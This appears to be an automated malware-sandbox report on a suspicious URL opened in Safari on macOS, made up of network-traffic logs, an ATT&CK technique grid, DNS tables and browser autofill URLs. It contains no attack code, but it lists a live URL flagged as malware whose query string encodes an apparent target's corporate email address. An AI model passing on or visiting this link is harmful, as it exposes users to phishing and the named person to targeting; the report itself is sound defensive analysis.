Source: unknownNetwork traffic detected: HTTP traffic on port 49407 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49428 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49379 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49371 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49392 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49425 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49442 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49404 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49439 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49385 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49399 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49446
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49445
Source: unknownNetwork traffic detected: HTTP traffic on port 49437 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49442
Source: unknownNetwork traffic detected: HTTP traffic on port 49414 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49441
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49440
Source: unknownNetwork traffic detected: HTTP traffic on port 49391 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49485 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49386 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49401 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49420 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49417 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49439
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49438
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49437
Source: unknownNetwork traffic detected: HTTP traffic on port 49409 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49434 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49436
Source: unknownNetwork traffic detected: HTTP traffic on port 49352 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49435
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49434
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49433
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49399
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49432
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49398
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49431
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49397
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49430
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49396
Source: unknownNetwork traffic detected: HTTP traffic on port 49440 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49395
Source: unknownNetwork traffic detected: HTTP traffic on port 49394 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49394
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49393
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49392
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49391
Source: unknownNetwork traffic detected: HTTP traffic on port 49377 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49390
Source: unknownNetwork traffic detected: HTTP traffic on port 49423 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49429
Source: unknownNetwork traffic detected: HTTP traffic on port 49479 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49428
Source: unknownNetwork traffic detected: HTTP traffic on port 49383 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49427
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49426
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49425
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49424
Source: unknownNetwork traffic detected: HTTP traffic on port 49435 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49423
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49389
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49422
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49388
Source: unknownNetwork traffic detected: HTTP traffic on port 49406 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49421
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49387
Source: unknownNetwork traffic detected: HTTP traffic on port 49412 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49420
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49386
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49385
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49384
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49383
Source: unknownNetwork traffic detected: HTTP traffic on port 49393 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49382
Source: unknownNetwork traffic detected: HTTP traffic on port 49429 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49441 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49369 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49403 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49419
Source: unknownNetwork traffic detected: HTTP traffic on port 49384 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49418
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49417
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49416
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49415
Source: unknownNetwork traffic detected: HTTP traffic on port 49375 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49414
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49413
Source: unknownNetwork traffic detected: HTTP traffic on port 49484 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49379
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49412
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49411
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49377
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49410
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49375
Source: unknownNetwork traffic detected: HTTP traffic on port 49415 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49432 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49373
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49371
Source: unknownNetwork traffic detected: HTTP traffic on port 49396 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49446 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49389 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49400 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49418 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49421 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49409
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49408
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49407
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49406
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49405
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49404
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49403
Source: unknownNetwork traffic detected: HTTP traffic on port 49410 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49369
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49402
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49401
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49400
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49486
Source: unknownNetwork traffic detected: HTTP traffic on port 49408 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49433 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49485
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49484
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49483
Source: unknownNetwork traffic detected: HTTP traffic on port 49427 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49395 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49353 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49424 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49348 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49382 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49479
Source: unknownNetwork traffic detected: HTTP traffic on port 49398 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49413 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49475
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49353
Source: unknownNetwork traffic detected: HTTP traffic on port 49405 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49430 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49474
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49352
Source: unknownNetwork traffic detected: HTTP traffic on port 49486 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49373 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49390 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49387 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49416 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49402 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49475 -> 443
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49352 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.195.6:443 -> 192.168.11.12:49353 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.59.250:443 -> 192.168.11.12:49369 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.1.229:443 -> 192.168.11.12:49386 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.11.12:49387 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.11.12:49388 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.66.42.211:443 -> 192.168.11.12:49389 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.59.250:443 -> 192.168.11.12:49422 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.59.250:443 -> 192.168.11.12:49424 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49474 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49475 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49479 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49483 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49484 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49485 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.3.6:443 -> 192.168.11.12:49486 version: TLS 1.2
Source: classification engineClassification label: mal48.mac@0/14@5/0
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)Random device file read: /dev/urandomJump to behavior
Source: /usr/libexec/firmwarecheckers/eficheck/eficheck (PID: 645)Random device file read: /dev/randomJump to behavior
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plistJump to behavior
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)Binary plist file created: /private/var/folders/t9/r5v5jljx0rb04g1yc95c7hw40000gp/T/com.apple.Safari/TemporaryItems/(A Document Being Saved By Safari)/KnownExtensions.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)XML plist file created: /private/var/folders/t9/r5v5jljx0rb04g1yc95c7hw40000gp/T/com.apple.Safari/TemporaryItems/(A Document Being Saved By Safari)/CloudHistoryRemoteConfiguration.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)Binary plist file created: /private/var/folders/t9/r5v5jljx0rb04g1yc95c7hw40000gp/T/com.apple.Safari/TemporaryItems/(A Document Being Saved By Safari 2)/AutoFillQuirks.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)Binary plist file created: /private/var/folders/t9/r5v5jljx0rb04g1yc95c7hw40000gp/T/com.apple.Safari/TemporaryItems/(A Document Being Saved By Safari)/Preferences.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)Binary plist file created: /private/var/folders/t9/r5v5jljx0rb04g1yc95c7hw40000gp/T/com.apple.Safari/TemporaryItems/(A Document Being Saved By Safari)/LastSession.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)Binary plist file created: /private/var/folders/t9/r5v5jljx0rb04g1yc95c7hw40000gp/T/com.apple.Safari/TemporaryItems/(A Document Being Saved By Safari)/CacheSettings.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)Binary plist file created: /private/var/folders/t9/r5v5jljx0rb04g1yc95c7hw40000gp/T/com.apple.Safari/TemporaryItems/(A Document Being Saved By Safari 2)/SearchDescriptions.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)Binary plist file created: /private/var/folders/t9/r5v5jljx0rb04g1yc95c7hw40000gp/T/com.apple.Safari/TemporaryItems/(A Document Being Saved By Safari 2)/LastSession.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)Binary plist file created: /private/var/folders/t9/r5v5jljx0rb04g1yc95c7hw40000gp/T/com.apple.Safari/TemporaryItems/(A Document Being Saved By Safari 3)/PerSiteZoomPreferences.plistJump to dropped file
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)Binary plist file created: /private/var/folders/t9/r5v5jljx0rb04g1yc95c7hw40000gp/T/com.apple.Safari/TemporaryItems/(A Document Being Saved By Safari)/TopSites.plistJump to dropped file
Source: /usr/bin/open (PID: 609)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /Applications/Safari.app/Contents/MacOS/Safari (PID: 610)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1645253 URL: https://Newscorp.wtranovati... Startdate: 21/03/2025 Architecture: MAC Score: 48 14 jsdelivr.map.fastly.net 151.101.1.229, 443, 49386 FASTLYUS United States 2->14 16 151.101.195.6, 443, 49352, 49353 FASTLYUS United States 2->16 18 7 other IPs or domains 2->18 20 Antivirus / Scanner detection for submitted sample 2->20 6 xpcproxy nsurlstoraged 2->6         started        8 xpcproxy Safari 13 2->8         started        10 xpcproxy silhouette 2->10         started        12 2 other processes 2->12 signatures3 process4

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


cam-macmac-stand
SourceDetectionScannerLabelLink
https://Newscorp.wtranovations.com/edzxesfee/d205afd3/?0pcb7=dHRob3JwZUBuZXdzY29ycC5jb20=__;!!F0Stn7g!E0yRpQQMM0NAZFe0WZgVZoU9UW-O8fAzEbpBRs9Nx6gsHTBN5bkxYcJeSQF_jMoSh7a26p6PazhhZgHyEsclklDH$100%Avira URL Cloudmalware
No Antivirus matches
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.1.229
truefalse
    high
    cdnjs.cloudflare.com
    104.17.24.14
    truefalse
      high
      newscorp.wtranovations.com
      104.21.59.250
      truefalse
        unknown
        challenges.cloudflare.com
        104.18.95.41
        truefalse
          high
          cdn4.iconfinder.com
          172.66.42.211
          truefalse
            high
            cdn.jsdelivr.net
            unknown
            unknownfalse
              high
              NameMaliciousAntivirus DetectionReputation
              https://cdn4.iconfinder.com/data/icons/ionicons/512/icon-close-round-512.pngfalse
                high
                https://newscorp.wtranovations.com/ad083999f1/start?for=/edzxesfee/d205afd3/false
                  unknown
                  https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/webfonts/fa-regular-400.woff2false
                    high
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.sephora.com/profile/MyAccount_AutoFillQuirks.plist.244.drfalse
                      high
                      https://myaccount.uscis.gov/users/registration/password_AutoFillQuirks.plist.244.drfalse
                        high
                        https://www.dotloop.com/my/account/#/settings_AutoFillQuirks.plist.244.drfalse
                          high
                          https://xhamster.com/password-recovery_AutoFillQuirks.plist.244.drfalse
                            high
                            https://hotels.com/profile/settings.html_AutoFillQuirks.plist.244.drfalse
                              high
                              https://myspace.com/settings/profile/email_AutoFillQuirks.plist.244.drfalse
                                high
                                https://www.usaa.com/inet/ent_auth_password/pages/ChangePasswordPage_AutoFillQuirks.plist.244.drfalse
                                  high
                                  https://allegro.pl/moje-allegro/moje-konto/logowanie-i-haslo_AutoFillQuirks.plist.244.drfalse
                                    high
                                    https://customer.xfinity.com/users/me/update-password_AutoFillQuirks.plist.244.drfalse
                                      high
                                      https://moncompte.lemonde.fr/gcustomer/account/password_AutoFillQuirks.plist.244.drfalse
                                        high
                                        https://shein.com/user/security_AutoFillQuirks.plist.244.drfalse
                                          high
                                          https://www.discogs.com/settings/user_AutoFillQuirks.plist.244.drfalse
                                            high
                                            https://support.opentable.com/s/login/ForgotPassword?language=en_US_AutoFillQuirks.plist.244.drfalse
                                              high
                                              https://fps.fidelity.com/ftgw/Fps/Fidelity/RtlCust/ChangePIN/Init_AutoFillQuirks.plist.244.drfalse
                                                high
                                                https://www.amazon.com/ax/account/manage_AutoFillQuirks.plist.244.drfalse
                                                  high
                                                  https://www.newsweek.com/contact_AutoFillQuirks.plist.244.drfalse
                                                    high
                                                    https://www.birkenstock.com/profile_AutoFillQuirks.plist.244.drfalse
                                                      high
                                                      https://id.sonyentertainmentnetwork.com/id/management/#/p/security_AutoFillQuirks.plist.244.drfalse
                                                        high
                                                        https://www.nba.com/account/nbaprofile_AutoFillQuirks.plist.244.drfalse
                                                          high
                                                          https://cloud.linode.com/profile/auth_AutoFillQuirks.plist.244.drfalse
                                                            high
                                                            https://b2c.voegol.com.br/minhas-viagens/meu-perfil_AutoFillQuirks.plist.244.drfalse
                                                              high
                                                              https://codepen.io/settings/account_AutoFillQuirks.plist.244.drfalse
                                                                high
                                                                https://www.serasa.com.br/meus-dados/alterar-senha_AutoFillQuirks.plist.244.drfalse
                                                                  high
                                                                  https://reg.usps.com/entreg/secure/ChangePasswordAction_input?returnActionName_AutoFillQuirks.plist.244.drfalse
                                                                    high
                                                                    https://www.allrecipes.com/account/profile#/change-password_AutoFillQuirks.plist.244.drfalse
                                                                      high
                                                                      https://pro.housecallpro.com/service_pro/account/reset_password_AutoFillQuirks.plist.244.drfalse
                                                                        high
                                                                        https://user.manganelo.com/user_changes_pass_AutoFillQuirks.plist.244.drfalse
                                                                          high
                                                                          https://www.dailymail.co.uk/registration/profile/change-password.html_AutoFillQuirks.plist.244.drfalse
                                                                            high
                                                                            https://www.11st.co.kr/register/popupModifyPWD.tmall_AutoFillQuirks.plist.244.drfalse
                                                                              high
                                                                              https://www.zulily.com/account/edit?rel=top_flyout_AutoFillQuirks.plist.244.drfalse
                                                                                high
                                                                                https://cam.ana.co.jp/psz/us/amc_us.jsp?index=105_AutoFillQuirks.plist.244.drfalse
                                                                                  high
                                                                                  https://www.creditkarma.com/myprofile/security_AutoFillQuirks.plist.244.drfalse
                                                                                    high
                                                                                    https://secure07ea.chase.com/web/auth/dashboard#/dashboard/myProfileSignInSecurity/resetPassword/resAutoFillQuirks.plist.244.drfalse
                                                                                      high
                                                                                      https://account.magento.com/customer/account/changepassword_AutoFillQuirks.plist.244.drfalse
                                                                                        high
                                                                                        https://profile.theguardian.com/reset_AutoFillQuirks.plist.244.drfalse
                                                                                          high
                                                                                          https://reelgood.com/account_AutoFillQuirks.plist.244.drfalse
                                                                                            high
                                                                                            https://dash.e.jimdo.com/profile_AutoFillQuirks.plist.244.drfalse
                                                                                              high
                                                                                              https://go.com/profile/account-settings/edit_AutoFillQuirks.plist.244.drfalse
                                                                                                high
                                                                                                https://genius.com/password_resets/new_AutoFillQuirks.plist.244.drfalse
                                                                                                  high
                                                                                                  https://www.macys.com/account/profile?cm_sp=macys_account-_-my_account-_-my_profile&linklocation=lefAutoFillQuirks.plist.244.drfalse
                                                                                                    high
                                                                                                    https://logowanie.pl.canalplus.com/zmien-haslo_AutoFillQuirks.plist.244.drfalse
                                                                                                      high
                                                                                                      https://www.alternate.de/html/myAccount/account/basicData.html_AutoFillQuirks.plist.244.drfalse
                                                                                                        high
                                                                                                        https://blend.io/settings_AutoFillQuirks.plist.244.drfalse
                                                                                                          high
                                                                                                          https://www.aesop.com/my-account_AutoFillQuirks.plist.244.drfalse
                                                                                                            high
                                                                                                            https://member.daum.net/change/password.daum_AutoFillQuirks.plist.244.drfalse
                                                                                                              high
                                                                                                              https://myaccount.virginmobile.ca/MyProfile/Details/EditProfile?editField=PASSWORD_AutoFillQuirks.plist.244.drfalse
                                                                                                                high
                                                                                                                https://mastercard.syf.com/login/reset_AutoFillQuirks.plist.244.drfalse
                                                                                                                  high
                                                                                                                  https://www.jcpenney.com/account/dashboard/personal/info_AutoFillQuirks.plist.244.drfalse
                                                                                                                    high
                                                                                                                    https://www.yahoo.com/UYahooTopSites.plist.244.drfalse
                                                                                                                      high
                                                                                                                      https://worldstarhiphop.com/videos/reset.php_AutoFillQuirks.plist.244.drfalse
                                                                                                                        high
                                                                                                                        https://www.shoop.de/einstellungen/benutzerdaten_AutoFillQuirks.plist.244.drfalse
                                                                                                                          high
                                                                                                                          https://accounts.shopify.com/accounts/186490458/security_AutoFillQuirks.plist.244.drfalse
                                                                                                                            high
                                                                                                                            https://app.carta.com/profiles/update/_AutoFillQuirks.plist.244.drfalse
                                                                                                                              high
                                                                                                                              https://legacy.memoriams.com/Network/Account/ChangePassword_AutoFillQuirks.plist.244.drfalse
                                                                                                                                high
                                                                                                                                https://profile.callofduty.com/cod/info_AutoFillQuirks.plist.244.drfalse
                                                                                                                                  high
                                                                                                                                  https://blackwells.co.uk/bookshop/account/personal-details_AutoFillQuirks.plist.244.drfalse
                                                                                                                                    high
                                                                                                                                    https://secure.hulu.com/account_AutoFillQuirks.plist.244.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.splunk.com/my-account/#/profile-details_AutoFillQuirks.plist.244.drfalse
                                                                                                                                        high
                                                                                                                                        https://www.yelp.com/TYelpTopSites.plist.244.drfalse
                                                                                                                                          high
                                                                                                                                          https://news.ycombinator.com/changepw_AutoFillQuirks.plist.244.drfalse
                                                                                                                                            high
                                                                                                                                            https://classroom.udacity.com/settings/password_AutoFillQuirks.plist.244.drfalse
                                                                                                                                              high
                                                                                                                                              https://pwrecovery.ruc.dk_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                high
                                                                                                                                                https://secure.ssa.gov/RIM/UpwdView.action_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.ancestry.com/account/security/password_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://key.harvard.edu/manage-account/change-password_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.amazon.ca/ax/account/manage_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://account.id.me/signin/password_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.carnival.com/profilemanagement/profiles/changepassword_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://thejigsawpuzzles.com/profile/?changepassword_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.patreon.com/settings/account_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://account.deere.com/actmgmt/change-password_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://www.ikea.com/in/en/profile/dashboard/_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://apps.anatel.gov.br/AnatelConsumidor/ConsumidorEditar.aspx_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://www.safeway.com/customer-account/account-settings_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://www.amazon.de/ax/account/manage_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://www.cars.com/reset_password_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://www.amazon.es/ax/account/manage_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.zocdoc.com/patient/editprofile?section=Password_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://www.apartments.com/my-account/#_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://logonservices.iam.target.com/change-password/?target=#AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.aerlingus.com/html/user-profile.html_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.dickssportinggoods.com/MyAccount/AccountSettings_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://login.tmon.co.kr/user/info_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://my.nextdns.io/account_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://secure.indeed.com/account/changepassword_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://www.temu.com/bgp_account_security.html_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://imgur.com/account/settings/password_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://my.norton.com/extspa/account/personalinfo_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://account.proton.me/u/0/vpn/account-password_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.espn.com/_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://www.consumidor.gov.br/pages/usuario/editar_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://www.nike.com/member/settings_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://www.bathandbodyworks.com/my-account/edit-profile_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://myvpostpay.verizon.com/ui/bill/secure/_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://www.glassdoor.com/member/profile/settings.htm_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://employeewe.bamboohr.com/dashboard/password.php_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://login.yahoo.com/account/change-password_AutoFillQuirks.plist.244.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                      151.101.1.229
